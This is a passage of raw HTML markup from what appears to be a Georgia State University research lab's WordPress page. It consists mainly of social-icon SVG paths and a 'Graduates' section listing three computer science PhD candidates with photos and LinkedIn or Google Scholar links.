125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/faris-hawamdeh/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Faris-Hawamdeh\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c67\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c67 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c140\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c140 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c141-outer\">\n            <div data-colibri-id=\"182-c141\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c141 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c142\" class=\"h-global-transition-all h-heading style-862 style-local-182-c142 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c142\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c68\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c68 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c69-outer\">\n            <div data-colibri-id=\"182-c69\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c69 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c70\" class=\"d-block style-854 style-local-182-c70 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\" class=\"wp-image-1742 style-854-image style-local-182-c70-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c70-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c71\" class=\"h-global-transition-all h-heading style-850 style-local-182-c71 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c71\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c72\" class=\"h-text h-text-component style-851 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c73\" class=\"h-text h-text-component style-902 style-local-182-c73 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c74\" class=\"style-855 style-local-182-c74 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-849 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\" class=\"wp-image-1744 style-849-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-901 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-853 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-856 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Emma-e1697205932363.jpg\" class=\"wp-image-1745 style-856-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-852 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-857 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 